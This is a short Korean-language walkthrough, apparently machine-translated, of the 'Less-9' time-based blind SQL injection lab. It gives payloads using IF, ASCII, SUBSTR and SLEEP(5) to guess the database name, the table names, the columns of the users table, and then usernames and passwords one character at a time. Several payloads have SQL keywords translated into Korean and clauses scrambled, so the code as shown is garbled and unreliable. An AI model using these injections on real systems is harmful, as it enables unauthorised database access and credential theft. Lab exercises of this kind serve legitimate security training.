적은-9 가져 오기 - 블라인드에 시간을 기준으로 단 하나 지수
원본 페이지
블라인드의 시간을 기준으로
직접 다시이 정확한지는 잘못된 시간은 5 초 동안 기다리합니다.
1. 데이터베이스 추측 :
?. = ID 1 '과하면 (. ASCII (SUBSTR (데이터베이스 (), 1,1)) 115,1, SLEEP (= 5)) - +
? = ID 1.'하고, 만약 (ASCII (SUBSTR ( 데이터베이스 (), 1,1)) = 114,1, 슬립 (5)) - +가 
먼저 설명 S (ASCII 코드 115)
(ASCII (ID = 1'and면? 수면 (5) SUBSTR (데이터베이스 (), 2,1)) = 101,1) - + 
설명 번째 E는 (ASCII 코드는 101이다) 인
, 등등 .. 그리고 데이터베이스 보안의 이름을 얻을
2. 추론 데이터 보안 데이터베이스 테이블 :
? 언급 ID 상술 = 1'and 경우] (ASCII (SUBSTR ((INFORMATION_SCHEMA.TABLES 여기서 SELECT TABLE_NAME의 TABLE_SCHEMA = '보안'제한 0, 1), 1, 1)) (1) 101 =로부터 절전 (5)) - +
? ID = 1'and하면 (아스키 ( INFORMATION_SCHEMA.TABLES에서 SUBSTR ((선택 TABLE_NAME 곳 TABLE_SCHEMA = '보안'제한 0,1), 1,1)) = 100,1, 수면 (5)) - + 
설명 첫 번째 테이블은 데이터 전자입니다 ... 등등, 이메일을받지
? ID = 1'and 경우] (ASCII (SUBSTR ((TABLE_NAME WHERE INFORMATION_SCHEMA.TABLES TABLE_SCHEMA = '보안'제한 1,1), 1,1)) = 114,1, SLEEP (에서 SELECT 5).) - +
(분석 위의 단계)
여러 번 시도 후 모든 데이터 시트 이메일, 리퍼러, uagents 사용자를 얻을 수 있습니다
3. 테이블 추측 사용자 컬럼 :
? 언급 된 상기 식 1'and 경우] (ASCII (SUBSTR ((INFORMATION_SCHEMA.COLUMNS 상기 SELECT 항목명 TABLE_NAME에서 = '사용자 제한 0, 1), 1, 1)) = 105,1, SLEEP (5)) - +
(문헌 판정 공정)
여러 시도는 열 이름 번호, 사용자 이름, 패스워드 인
4. 추측 이름의 값 :
? ID = 1'and 경우] (. ASCII는 (SUBSTR ((SELECT 사용자 이름 사용자가 0,1 제한에서), 1,1)) = - 68, SLEEP (5)) - +
(의사 결정 단계 같은 책.)
여러 번 시도는 모든 사용자 이름과 암호를 얻을 수 있습니다
